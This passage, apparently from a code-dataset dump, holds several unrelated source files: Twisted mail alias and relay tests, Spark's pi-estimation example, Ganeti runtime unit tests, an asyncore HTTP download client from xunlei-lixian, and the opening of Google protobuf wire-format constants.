self.destServer = reactor.listenTCP(0, f, interface='127.0.0.1')
# Update the port number the *first* relay will connect to, because we can't use
# port 25
manager.PORT = self.destServer.getHost().port
client = LineSendingProtocol([
'HELO meson',
'MAIL FROM: <user@wherever>',
'RCPT TO: <[email protected]>',
'DATA',
'This is the message',
'.',
'QUIT'
])
done = Deferred()
f = protocol.ClientFactory()
f.protocol = lambda: client
f.clientConnectionLost = lambda *args: done.callback(None)
reactor.connectTCP('127.0.0.1', self.insServer.getHost().port, f)
def finished(ign):
# First part of the delivery is done. Poke the queue manually now
# so we don't have to wait for the queue to be flushed.
delivery = manager.checkState()
def delivered(ign):
mbox = domain.requestAvatar('user', None, pop3.IMailbox)[1]
msg = mbox.getMessage(0).read()
self.failIfEqual(msg.find('This is the message'), -1)
self.insServer.stopListening()
self.destServer.stopListening()
helper.stopService()
delivery.addCallback(delivered)
return delivery
done.addCallback(finished)
return done
aliasFile = StringIO.StringIO("""\
# Here's a comment
# woop another one
testuser: address1,address2, address3,
continuation@address, |/bin/process/this
usertwo:thisaddress,thataddress, lastaddress
lastuser: :/includable, /filename, |/program, address
""")
class LineBufferMessage:
def __init__(self):
self.lines = []
self.eom = False
self.lost = False
def lineReceived(self, line):
self.lines.append(line)
def eomReceived(self):
self.eom = True
return defer.succeed('<Whatever>')
def connectionLost(self):
self.lost = True
class AliasTestCase(unittest.TestCase):
lines = [
'First line',
'Next line',
'',
'After a blank line',
'Last line'
]
def setUp(self):
aliasFile.seek(0)
def testHandle(self):
result = {}
lines = [
'user: another@host\n',
'nextuser: |/bin/program\n',
'user: me@again\n',
'moreusers: :/etc/include/filename\n',
'multiuser: first@host, second@host,last@anotherhost',
]
for l in lines:
mail.alias.handle(result, l, 'TestCase', None)
self.assertEqual(result['user'], ['another@host', 'me@again'])
self.assertEqual(result['nextuser'], ['|/bin/program'])
self.assertEqual(result['moreusers'], [':/etc/include/filename'])
self.assertEqual(result['multiuser'], ['first@host', 'second@host', 'last@anotherhost'])
def testFileLoader(self):
domains = {'': object()}
result = mail.alias.loadAliasFile(domains, fp=aliasFile)
self.assertEqual(len(result), 3)
group = result['testuser']
s = str(group)
for a in ('address1', 'address2', 'address3', 'continuation@address', '/bin/process/this'):
self.failIfEqual(s.find(a), -1)
self.assertEqual(len(group), 5)
group = result['usertwo']
s = str(group)
for a in ('thisaddress', 'thataddress', 'lastaddress'):
self.failIfEqual(s.find(a), -1)
self.assertEqual(len(group), 3)
group = result['lastuser']
s = str(group)
self.assertEqual(s.find('/includable'), -1)
for a in ('/filename', 'program', 'address'):
self.failIfEqual(s.find(a), -1, '%s not found' % a)
self.assertEqual(len(group), 3)
def testMultiWrapper(self):
msgs = LineBufferMessage(), LineBufferMessage(), LineBufferMessage()
msg = mail.alias.MultiWrapper(msgs)
for L in self.lines:
msg.lineReceived(L)
return msg.eomReceived().addCallback(self._cbMultiWrapper, msgs)
def _cbMultiWrapper(self, ignored, msgs):
for m in msgs:
self.failUnless(m.eom)
self.failIf(m.lost)
self.assertEqual(self.lines, m.lines)
def testFileAlias(self):
tmpfile = self.mktemp()
a = mail.alias.FileAlias(tmpfile, None, None)
m = a.createMessageReceiver()
for l in self.lines:
m.lineReceived(l)
return m.eomReceived().addCallback(self._cbTestFileAlias, tmpfile)
def _cbTestFileAlias(self, ignored, tmpfile):
lines = file(tmpfile).readlines()
self.assertEqual([L[:-1] for L in lines], self.lines)
class DummyDomain(object):
"""
Test domain for L{AddressAliasTests}.
"""
def __init__(self, address):
self.address = address
def exists(self, user, memo=None):
"""
@returns: When a C{memo} is passed in this will raise a
L{smtp.SMTPBadRcpt} exception, otherwise a boolean
indicating if the C{user} and string version of
L{self.address} are equal or not.
@rtype: C{bool}
"""
if memo:
raise mail.smtp.SMTPBadRcpt('ham')
return lambda: user == str(self.address)
class AddressAliasTests(unittest.TestCase):
"""
Tests for L{twisted.mail.alias.AddressAlias}.
"""
def setUp(self):
"""
Setup an L{AddressAlias}.
"""
self.address = mail.smtp.Address('foo@bar')
domains = {self.address.domain: DummyDomain(self.address)}
self.alias = mail.alias.AddressAlias(self.address, domains,
self.address)
def test_createMessageReceiver(self):
"""
L{createMessageReceiever} calls C{exists()} on the domain object
which key matches the C{alias} passed to L{AddressAlias}.
"""
self.assertTrue(self.alias.createMessageReceiver())
def test_str(self):
"""
The string presentation of L{AddressAlias} includes the alias.
"""
self.assertEqual(str(self.alias), '<Address foo@bar>')
def test_resolve(self):
"""
L{resolve} will look for additional aliases when an C{aliasmap}
dictionary is passed, and returns C{None} if none were found.
"""
self.assertEqual(self.alias.resolve({self.address: 'bar'}), None)
def test_resolveWithoutAliasmap(self):
"""
L{resolve} returns C{None} when the alias could not be found in the
C{aliasmap} and no L{mail.smtp.User} with this alias exists either.
"""
self.assertEqual(self.alias.resolve({}), None)
class DummyProcess(object):
__slots__ = ['onEnd']
class MockProcessAlias(mail.alias.ProcessAlias):
"""
A alias processor that doesn't actually launch processes.
"""
def spawnProcess(self, proto, program, path):
"""
Don't spawn a process.
"""
class MockAliasGroup(mail.alias.AliasGroup):
"""
An alias group using C{MockProcessAlias}.
"""
processAliasFactory = MockProcessAlias
class StubProcess(object):
"""
Fake implementation of L{IProcessTransport}.
@ivar signals: A list of all the signals which have been sent to this fake
process.
"""
def __init__(self):
self.signals = []
def loseConnection(self):
"""
No-op implementation of disconnection.
"""
def signalProcess(self, signal):
"""
Record a signal sent to this process for later inspection.
"""
self.signals.append(signal)
class ProcessAliasTestCase(unittest.TestCase):
"""
Tests for alias resolution.
"""
if interfaces.IReactorProcess(reactor, None) is None:
skip = "IReactorProcess not supported"
lines = [
'First line',
'Next line',
'',
'After a blank line',
'Last line'
]
def exitStatus(self, code):
"""
Construct a status from the given exit code.
@type code: L{int} between 0 and 255 inclusive.
@param code: The exit status which the code will represent.
@rtype: L{int}
@return: A status integer for the given exit code.
"""
# /* Macros for constructing status values. */
# #define __W_EXITCODE(ret, sig) ((ret) << 8 | (sig))
status = (code << 8) | 0
# Sanity check
self.assertTrue(os.WIFEXITED(status))
self.assertEqual(os.WEXITSTATUS(status), code)
self.assertFalse(os.WIFSIGNALED(status))
return status
def signalStatus(self, signal):
"""
Construct a status from the given signal.
@type signal: L{int} between 0 and 255 inclusive.
@param signal: The signal number which the status will represent.
@rtype: L{int}
@return: A status integer for the given signal.
"""
# /* If WIFSIGNALED(STATUS), the terminating signal. */
# #define __WTERMSIG(status) ((status) & 0x7f)
# /* Nonzero if STATUS indicates termination by a signal. */
# #define __WIFSIGNALED(status) \
# (((signed char) (((status) & 0x7f) + 1) >> 1) > 0)
status = signal
# Sanity check
self.assertTrue(os.WIFSIGNALED(status))
self.assertEqual(os.WTERMSIG(status), signal)
self.assertFalse(os.WIFEXITED(status))
return status
def setUp(self):
"""
Replace L{smtp.DNSNAME} with a well-known value.
"""
self.DNSNAME = smtp.DNSNAME
smtp.DNSNAME = ''
def tearDown(self):
"""
Restore the original value of L{smtp.DNSNAME}.
"""
smtp.DNSNAME = self.DNSNAME
def test_processAlias(self):
"""
Standard call to C{mail.alias.ProcessAlias}: check that the specified
script is called, and that the input is correctly transferred to it.
"""
sh = FilePath(self.mktemp())
sh.setContent("""\
#!/bin/sh
rm -f process.alias.out
while read i; do
echo $i >> process.alias.out
done""")
os.chmod(sh.path, 0700)
a = mail.alias.ProcessAlias(sh.path, None, None)
m = a.createMessageReceiver()
for l in self.lines:
m.lineReceived(l)
def _cbProcessAlias(ignored):
lines = file('process.alias.out').readlines()
self.assertEqual([L[:-1] for L in lines], self.lines)
return m.eomReceived().addCallback(_cbProcessAlias)
def test_processAliasTimeout(self):
"""
If the alias child process does not exit within a particular period of
time, the L{Deferred} returned by L{MessageWrapper.eomReceived} should
fail with L{ProcessAliasTimeout} and send the I{KILL} signal to the
child process..
"""
reactor = task.Clock()
transport = StubProcess()
proto = mail.alias.ProcessAliasProtocol()
proto.makeConnection(transport)
receiver = mail.alias.MessageWrapper(proto, None, reactor)
d = receiver.eomReceived()
reactor.advance(receiver.completionTimeout)
def timedOut(ignored):
self.assertEqual(transport.signals, ['KILL'])
# Now that it has been killed, disconnect the protocol associated
# with it.
proto.processEnded(
ProcessTerminated(self.signalStatus(signal.SIGKILL)))
self.assertFailure(d, mail.alias.ProcessAliasTimeout)
d.addCallback(timedOut)
return d
def test_earlyProcessTermination(self):
"""
If the process associated with an L{mail.alias.MessageWrapper} exits
before I{eomReceived} is called, the L{Deferred} returned by
I{eomReceived} should fail.
"""
transport = StubProcess()
protocol = mail.alias.ProcessAliasProtocol()
protocol.makeConnection(transport)
receiver = mail.alias.MessageWrapper(protocol, None, None)
protocol.processEnded(failure.Failure(ProcessDone(0)))
return self.assertFailure(receiver.eomReceived(), ProcessDone)
def _terminationTest(self, status):
"""
Verify that if the process associated with an
L{mail.alias.MessageWrapper} exits with the given status, the
L{Deferred} returned by I{eomReceived} fails with L{ProcessTerminated}.
"""
transport = StubProcess()
protocol = mail.alias.ProcessAliasProtocol()
protocol.makeConnection(transport)
receiver = mail.alias.MessageWrapper(protocol, None, None)
protocol.processEnded(
failure.Failure(ProcessTerminated(status)))
return self.assertFailure(receiver.eomReceived(), ProcessTerminated)
def test_errorProcessTermination(self):
"""
If the process associated with an L{mail.alias.MessageWrapper} exits
with a non-zero exit code, the L{Deferred} returned by I{eomReceived}
should fail.
"""
return self._terminationTest(self.exitStatus(1))
def test_signalProcessTermination(self):
"""
If the process associated with an L{mail.alias.MessageWrapper} exits
because it received a signal, the L{Deferred} returned by
I{eomReceived} should fail.
"""
return self._terminationTest(self.signalStatus(signal.SIGHUP))
def test_aliasResolution(self):
"""
Check that the C{resolve} method of alias processors produce the correct
set of objects:
- direct alias with L{mail.alias.AddressAlias} if a simple input is passed
- aliases in a file with L{mail.alias.FileWrapper} if an input in the format
'/file' is given
- aliases resulting of a process call wrapped by L{mail.alias.MessageWrapper}
if the format is '|process'
"""
aliases = {}
domain = {'': TestDomain(aliases, ['user1', 'user2', 'user3'])}
A1 = MockAliasGroup(['user1', '|echo', '/file'], domain, 'alias1')
A2 = MockAliasGroup(['user2', 'user3'], domain, 'alias2')
A3 = mail.alias.AddressAlias('alias1', domain, 'alias3')
aliases.update({
'alias1': A1,
'alias2': A2,
'alias3': A3,
})
res1 = A1.resolve(aliases)
r1 = map(str, res1.objs)
r1.sort()
expected = map(str, [
mail.alias.AddressAlias('user1', None, None),
mail.alias.MessageWrapper(DummyProcess(), 'echo'),
mail.alias.FileWrapper('/file'),
])
expected.sort()
self.assertEqual(r1, expected)
res2 = A2.resolve(aliases)
r2 = map(str, res2.objs)
r2.sort()
expected = map(str, [
mail.alias.AddressAlias('user2', None, None),
mail.alias.AddressAlias('user3', None, None)
])
expected.sort()
self.assertEqual(r2, expected)
res3 = A3.resolve(aliases)
r3 = map(str, res3.objs)
r3.sort()
expected = map(str, [
mail.alias.AddressAlias('user1', None, None),
mail.alias.MessageWrapper(DummyProcess(), 'echo'),
mail.alias.FileWrapper('/file'),
])
expected.sort()
self.assertEqual(r3, expected)
def test_cyclicAlias(self):
"""
Check that a cycle in alias resolution is correctly handled.
"""
aliases = {}
domain = {'': TestDomain(aliases, [])}
A1 = mail.alias.AddressAlias('alias2', domain, 'alias1')
A2 = mail.alias.AddressAlias('alias3', domain, 'alias2')
A3 = mail.alias.AddressAlias('alias1', domain, 'alias3')
aliases.update({
'alias1': A1,
'alias2': A2,
'alias3': A3
})
self.assertEqual(aliases['alias1'].resolve(aliases), None)
self.assertEqual(aliases['alias2'].resolve(aliases), None)
self.assertEqual(aliases['alias3'].resolve(aliases), None)
A4 = MockAliasGroup(['|echo', 'alias1'], domain, 'alias4')
aliases['alias4'] = A4
res = A4.resolve(aliases)
r = map(str, res.objs)
r.sort()
expected = map(str, [
mail.alias.MessageWrapper(DummyProcess(), 'echo')
])
expected.sort()
self.assertEqual(r, expected)
class TestDomain:
def __init__(self, aliases, users):
self.aliases = aliases
self.users = users
def exists(self, user, memo=None):
user = user.dest.local
if user in self.users:
return lambda: mail.alias.AddressAlias(user, None, None)
try:
a = self.aliases[user]
except:
raise smtp.SMTPBadRcpt(user)
else:
aliases = a.resolve(self.aliases, memo)
if aliases:
return lambda: aliases
raise smtp.SMTPBadRcpt(user)
class SSLContextFactoryTests(unittest.TestCase):
"""
Tests for twisted.mail.protocols.SSLContextFactory.
"""
def test_deprecation(self):
"""
Accessing L{twisted.mail.protocols.SSLContextFactory} emits a
deprecation warning recommending the use of the more general SSL context
factory from L{twisted.internet.ssl}.
"""
mail.protocols.SSLContextFactory
warningsShown = self.flushWarnings([self.test_deprecation])
self.assertEqual(len(warningsShown), 1)
self.assertIdentical(warningsShown[0]['category'], DeprecationWarning)
self.assertEqual(
warningsShown[0]['message'],
'twisted.mail.protocols.SSLContextFactory was deprecated in '
'Twisted 12.2.0: Use twisted.internet.ssl.'
'DefaultOpenSSLContextFactory instead.')
from twisted.python.runtime import platformType
import types
if platformType != "posix":
for o in locals().values():
if isinstance(o, (types.ClassType, type)) and issubclass(o, unittest.TestCase):
o.skip = "twisted.mail only works on posix"
|
maropu/spark
|
refs/heads/master
|
examples/src/main/python/pi.py
|
27
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import sys
from random import random
from operator import add
from pyspark.sql import SparkSession
if __name__ == "__main__":
"""
Usage: pi [partitions]
"""
spark = SparkSession\
.builder\
.appName("PythonPi")\
.getOrCreate()
partitions = int(sys.argv[1]) if len(sys.argv) > 1 else 2
n = 100000 * partitions
def f(_):
x = random() * 2 - 1
y = random() * 2 - 1
return 1 if x ** 2 + y ** 2 <= 1 else 0
count = spark.sparkContext.parallelize(range(1, n + 1), partitions).map(f).reduce(add)
print("Pi is roughly %f" % (4.0 * count / n))
spark.stop()
|
bitemyapp/ganeti
|
refs/heads/master
|
test/py/ganeti.runtime_unittest.py
|
9
|
#!/usr/bin/python
#
# Copyright (C) 2010 Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED
# TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Script for testing ganeti.runtime"""
from ganeti import constants
from ganeti import errors
from ganeti import runtime
from ganeti import ht
import testutils
import unittest
class _EntStub:
def __init__(self, uid=None, gid=None):
self.pw_uid = uid
self.gr_gid = gid
def _StubGetpwnam(user):
users = {
constants.MASTERD_USER: _EntStub(uid=0),
constants.CONFD_USER: _EntStub(uid=1),
constants.RAPI_USER: _EntStub(uid=2),
constants.NODED_USER: _EntStub(uid=3),
constants.LUXID_USER: _EntStub(uid=4),
constants.WCONFD_USER: _EntStub(uid=5),
}
return users[user]
def _StubGetgrnam(group):
groups = {
constants.MASTERD_GROUP: _EntStub(gid=0),
constants.CONFD_GROUP: _EntStub(gid=1),
constants.RAPI_GROUP: _EntStub(gid=2),
constants.DAEMONS_GROUP: _EntStub(gid=3),
constants.ADMIN_GROUP: _EntStub(gid=4),
constants.NODED_GROUP: _EntStub(gid=5),
constants.LUXID_GROUP: _EntStub(gid=6),
constants.WCONFD_GROUP: _EntStub(gid=7),
}
return groups[group]
def _RaisingStubGetpwnam(user):
raise KeyError("user not found")
def _RaisingStubGetgrnam(group):
raise KeyError("group not found")
class ResolverStubRaising(object):
def __init__(self):
raise errors.ConfigurationError("No entries")
class TestErrors(unittest.TestCase):
def setUp(self):
self.resolver = runtime.GetentResolver(_getpwnam=_StubGetpwnam,
_getgrnam=_StubGetgrnam)
def testEverythingSuccessful(self):
self.assertEqual(self.resolver.masterd_uid,
_StubGetpwnam(constants.MASTERD_USER).pw_uid)
self.assertEqual(self.resolver.masterd_gid,
_StubGetgrnam(constants.MASTERD_GROUP).gr_gid)
self.assertEqual(self.resolver.confd_uid,
_StubGetpwnam(constants.CONFD_USER).pw_uid)
self.assertEqual(self.resolver.confd_gid,
_StubGetgrnam(constants.CONFD_GROUP).gr_gid)
self.assertEqual(self.resolver.wconfd_uid,
_StubGetpwnam(constants.WCONFD_USER).pw_uid)
self.assertEqual(self.resolver.wconfd_gid,
_StubGetgrnam(constants.WCONFD_GROUP).gr_gid)
self.assertEqual(self.resolver.rapi_uid,
_StubGetpwnam(constants.RAPI_USER).pw_uid)
self.assertEqual(self.resolver.rapi_gid,
_StubGetgrnam(constants.RAPI_GROUP).gr_gid)
self.assertEqual(self.resolver.noded_uid,
_StubGetpwnam(constants.NODED_USER).pw_uid)
self.assertEqual(self.resolver.daemons_gid,
_StubGetgrnam(constants.DAEMONS_GROUP).gr_gid)
self.assertEqual(self.resolver.admin_gid,
_StubGetgrnam(constants.ADMIN_GROUP).gr_gid)
def testUserNotFound(self):
self.assertRaises(errors.ConfigurationError, runtime.GetentResolver,
_getpwnam=_RaisingStubGetpwnam, _getgrnam=_StubGetgrnam)
def testGroupNotFound(self):
self.assertRaises(errors.ConfigurationError, runtime.GetentResolver,
_getpwnam=_StubGetpwnam, _getgrnam=_RaisingStubGetgrnam)
def testUserNotFoundGetEnts(self):
self.assertRaises(errors.ConfigurationError, runtime.GetEnts,
resolver=ResolverStubRaising)
def testLookupForUser(self):
master_stub = _StubGetpwnam(constants.MASTERD_USER)
rapi_stub = _StubGetpwnam(constants.RAPI_USER)
self.assertEqual(self.resolver.LookupUid(master_stub.pw_uid),
constants.MASTERD_USER)
self.assertEqual(self.resolver.LookupUid(rapi_stub.pw_uid),
constants.RAPI_USER)
self.assertEqual(self.resolver.LookupUser(constants.MASTERD_USER),
master_stub.pw_uid)
self.assertEqual(self.resolver.LookupUser(constants.RAPI_USER),
rapi_stub.pw_uid)
def testLookupForGroup(self):
master_stub = _StubGetgrnam(constants.MASTERD_GROUP)
rapi_stub = _StubGetgrnam(constants.RAPI_GROUP)
self.assertEqual(self.resolver.LookupGid(master_stub.gr_gid),
constants.MASTERD_GROUP)
self.assertEqual(self.resolver.LookupGid(rapi_stub.gr_gid),
constants.RAPI_GROUP)
def testLookupForUserNotFound(self):
self.assertRaises(errors.ConfigurationError, self.resolver.LookupUid, 9999)
self.assertRaises(errors.ConfigurationError,
self.resolver.LookupUser, "does-not-exist-foo")
def testLookupForGroupNotFound(self):
self.assertRaises(errors.ConfigurationError, self.resolver.LookupGid, 9999)
self.assertRaises(errors.ConfigurationError,
self.resolver.LookupGroup, "does-not-exist-foo")
class TestArchInfo(unittest.TestCase):
EXP_TYPES = \
ht.TAnd(ht.TIsLength(2),
ht.TItems([
ht.TNonEmptyString,
ht.TNonEmptyString,
]))
def setUp(self):
self.assertTrue(runtime._arch is None)
def tearDown(self):
runtime._arch = None
def testNotInitialized(self):
self.assertRaises(errors.ProgrammerError, runtime.GetArchInfo)
def testInitializeMultiple(self):
runtime.InitArchInfo()
self.assertRaises(errors.ProgrammerError, runtime.InitArchInfo)
def testNormal(self):
runtime.InitArchInfo()
info = runtime.GetArchInfo()
self.assertTrue(self.EXP_TYPES(info),
msg=("Doesn't match expected type description: %s" %
self.EXP_TYPES))
if __name__ == "__main__":
testutils.GanetiTestProgram()
|
myself659/xunlei-lixian
|
refs/heads/master
|
lixian_download_asyn.py
|
14
|
import asyncore
import asynchat
import socket
import re
#from cStringIO import StringIO
from time import time, sleep
import sys
import os
#asynchat.async_chat.ac_out_buffer_size = 1024*1024
class http_client(asynchat.async_chat):
def __init__(self, url, headers=None, start_from=0):
asynchat.async_chat.__init__(self)
self.args = {'headers': headers, 'start_from': start_from}
m = re.match(r'http://([^/:]+)(?::(\d+))?(/.*)?$', url)
assert m, 'Invalid url: %s' % url
host, port, path = m.groups()
port = int(port or 80)
path = path or '/'
def resolve_host(host):
try:
return socket.gethostbyname(host)
except:
pass
host_ip = resolve_host(host)
if not host_ip:
self.log_error("host can't be resolved: " + host)
self.size = None
return
if host_ip == '180.168.41.175':
# fuck shanghai dian DNS
self.log_error('gethostbyname failed')
self.size = None
return
request_headers = {'host': host, 'connection': 'close'}
if start_from:
request_headers['RANGE'] = 'bytes=%d-' % start_from
if headers:
request_headers.update(headers)
headers = request_headers
self.request = 'GET %s HTTP/1.1\r\n%s\r\n\r\n' % (path, '\r\n'.join('%s: %s' % (k, headers[k]) for k in headers))
self.op = 'GET'
self.headers = {} # for response headers
#self.buffer = StringIO()
self.buffer = []
self.buffer_size = 0
self.cache_size = 1024*1024
self.size = None
self.completed = 0
self.set_terminator("\r\n\r\n")
self.reading_headers = True
self.create_socket(socket.AF_INET, socket.SOCK_STREAM)
try:
self.connect((host, port))
except:
self.close()
self.log_error('connect_failed')
def handle_connect(self):
self.start_time = time()
self.push(self.request)
def handle_close(self):
asynchat.async_chat.handle_close(self)
self.flush_data()
if self.reading_headers:
self.log_error('incomplete http response')
return
self.handle_status_update(self.size, self.completed, force_update=True)
self.handle_speed_update(self.completed, self.start_time, force_update=True)
if self.size is not None and self.completed < self.size:
self.log_error('incomplete download')
def handle_connection_error(self):
self.handle_error()
def handle_error(self):
self.close()
self.flush_data()
error_message = sys.exc_info()[1]
self.log_error('there is some error: %s' % error_message)
#raise
def collect_incoming_data(self, data):
if self.reading_headers:
#self.buffer.write(data)
self.buffer.append(data)
self.buffer_size += len(data)
return
elif self.cache_size:
#self.buffer.write(data)
self.buffer.append(data)
self.buffer_size += len(data)
#if self.buffer.tell() > self.cache_size:
if self.buffer_size > self.cache_size:
#self.handle_data(self.buffer.getvalue())
self.handle_data(''.join(self.buffer))
#self.buffer.truncate(0)
#self.buffer.clear()
del self.buffer[:]
self.buffer_size = 0
else:
self.handle_data(data)
self.completed += len(data)
self.handle_status_update(self.size, self.completed)
self.handle_speed_update(self.completed, self.start_time)
if self.size == self.completed:
self.close()
self.flush_data()
self.handle_status_update(self.size, self.completed, force_update=True)
self.handle_speed_update(self.completed, self.start_time, force_update=True)
def handle_data(self, data):
print len(data)
pass
def flush_data(self):
#if self.buffer.tell():
if self.buffer_size:
#self.handle_data(self.buffer.getvalue())
self.handle_data(''.join(self.buffer))
#self.buffer.truncate(0)
del self.buffer[:]
self.buffer_size = 0
def parse_headers(self, header):
lines = header.split('\r\n')
status_line = lines.pop(0)
#print status_line
protocal, status_code, status_text = re.match(r'^HTTP/([\d.]+) (\d+) (.+)$', status_line).groups()
status_code = int(status_code)
self.status_code = status_code
self.status_text = status_text
#headers = dict(h.split(': ', 1) for h in lines)
for k, v in (h.split(': ', 1) for h in lines):
self.headers[k.lower()] = v
if status_code in (200, 206):
pass
elif status_code == 302:
return self.handle_http_relocate(self.headers['location'])
else:
return self.handle_http_status_error()
self.size = self.headers.get('content-length', None)
if self.size is not None:
self.size = int(self.size)
self.handle_http_headers()
def found_terminator(self):
if self.reading_headers:
self.reading_headers = False
#self.parse_headers("".join(self.buffer.getvalue()))
self.parse_headers("".join(self.buffer))
#self.buffer.truncate(0)
del self.buffer[:]
self.buffer_size = 0
self.set_terminator(None)
else:
raise NotImplementedError()
def handle_http_headers(self):
pass
def handle_http_status_error(self):
self.close()
def handle_http_relocate(self, location):
self.close()
relocate_times = getattr(self, 'relocate_times', 0)
max_relocate_times = getattr(self, 'max_relocate_times', 2)
if relocate_times >= max_relocate_times:
raise Exception('too many relocate times')
new_client = self.__class__(location, **self.args)
new_client.relocate_times = relocate_times + 1
new_client.max_relocate_times = max_relocate_times
self.next_client = new_client
def handle_status_update(self, total, completed, force_update=False):
pass
def handle_speed_update(self, completed, start_time, force_update=False):
pass
def log_error(self, message):
print 'log_error', message
self.error_message = message
class ProgressBar:
def __init__(self, total=0):
self.total = total
self.completed = 0
self.start = time()
self.speed = 0
self.bar_width = 0
self.displayed = False
def update(self):
self.displayed = True
bar_size = 40
if self.total:
percent = self.completed * 100.0 / self.total
if percent > 100:
percent = 100.0
dots = int(bar_size * percent / 100)
plus = percent / 100 * bar_size - dots
if plus > 0.8:
plus = '='
elif plus > 0.4:
plus = '-'
else:
plus = ''
bar = '=' * dots + plus
percent = int(percent)
else:
percent = 0
bar = '-'
speed = self.speed
if speed < 1000:
speed = '%sB/s' % int(speed)
elif speed < 1000*10:
speed = '%.1fK/s' % (speed/1000.0)
elif speed < 1000*1000:
speed = '%dK/s' % int(speed/1000)
elif speed < 1000*1000*100:
speed = '%.1fM/s' % (speed/1000.0/1000.0)
else:
speed = '%dM/s' % int(speed/1000/1000)
seconds = time() - self.start
if seconds < 10:
seconds = '%.1fs' % seconds
elif seconds < 60:
seconds = '%ds' % int(seconds)
elif seconds < 60*60:
seconds = '%dm%ds' % (int(seconds/60), int(seconds)%60)
elif seconds < 60*60*24:
seconds = '%dh%dm%ds' % (int(seconds)/60/60, (int(seconds)/60)%60, int(seconds)%60)
else:
seconds = int(seconds)
days = seconds/60/60/24
seconds -= days*60*60*24
hours = seconds/60/60
seconds -= hours*60*60
minutes = seconds/60
seconds -= minutes*60
seconds = '%dd%dh%dm%ds' % (days, hours, minutes, seconds)
completed = ','.join((x[::-1] for x in reversed(re.findall('..?.?', str(self.completed)[::-1]))))
bar = '{0:>3}%[{1:<40}] {2:<12} {3:>4} in {4:>6s}'.format(percent, bar, completed, speed, seconds)
new_bar_width = len(bar)
bar = bar.ljust(self.bar_width)
self.bar_width = new_bar_width
sys.stdout.write('\r'+bar)
sys.stdout.flush()
def update_status(self, total, completed):
self.total = total
self.completed = completed
self.update()
def update_speed(self, start, speed):
self.start = start
self.speed = speed
self.update()
def done(self):
if self.displayed:
print
self.displayed = False
def download(url, path, headers=None, resuming=False):
class download_client(http_client):
def __init__(self, url, headers=headers, start_from=0):
self.output = None
self.bar = ProgressBar()
http_client.__init__(self, url, headers=headers, start_from=start_from)
self.start_from = start_from
self.last_status_time = time()
self.last_speed_time = time()
self.last_size = 0
self.path = path
def handle_close(self):
http_client.handle_close(self)
if self.output:
self.output.close()
self.output = None
def handle_http_status_error(self):
http_client.handle_http_status_error(self)
self.log_error('http status error: %s, %s' % (self.status_code, self.status_text))
def handle_data(self, data):
if not self.output:
if self.start_from:
self.output = open(path, 'ab')
else:
self.output = open(path, 'wb')
self.output.write(data)
def handle_status_update(self, total, completed, force_update=False):
if total is None:
return
if time() - self.last_status_time > 1 or force_update:
#print '%.02f' % (completed*100.0/total)
self.bar.update_status(total+start_from, completed+start_from)
self.last_status_time = time()
def handle_speed_update(self, completed, start_time, force_update=False):
now = time()
period = now - self.last_speed_time
if period > 1 or force_update:
#print '%.02f, %.02f' % ((completed-self.last_size)/period, completed/(now-start_time))
self.bar.update_speed(start_time, (completed-self.last_size)/period)
self.last_speed_time = time()
self.last_size = completed
def log_error(self, message):
self.bar.done()
http_client.log_error(self, message)
def __del__(self): # XXX: sometimes handle_close() is not called, don't know why...
#http_client.__del__(self)
if self.output:
self.output.close()
self.output = None
max_retry_times = 25
retry_times = 0
start_from = 0
if resuming and os.path.exists(path):
start_from = os.path.getsize(path)
# TODO: fix status bar for resuming
while True:
client = download_client(url, start_from=start_from)
asyncore.loop()
while hasattr(client, 'next_client'):
client = client.next_client
client.bar.done()
if getattr(client, 'error_message', None):
retry_times += 1
if retry_times >= max_retry_times:
raise Exception(client.error_message)
if client.size and client.completed:
start_from = os.path.getsize(path)
print 'retry', retry_times
sleep(retry_times)
else:
break
def main():
url, path = sys.argv[1:]
download(url, path)
if __name__ == '__main__':
main()
|
toomoresuch/pysonengine
|
refs/heads/master
|
parts/google_appengine/google/net/proto2/python/internal/wire_format.py
|
3
|
#!/usr/bin/env python
#
# Copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Constants and static functions to support protocol buffer wire format."""
import struct
from google.net.proto2.python.public import descriptor
from google.net.proto2.python.public import message
TAG_TYPE_BITS = 3
TAG_TYPE_MASK = (1 << TAG_TYPE_BITS) - 1
WIRETYPE_VARINT = 0
WIRETYPE_FIXED64 = 1
WIRETYPE_LENGTH_DELIMITED = 2
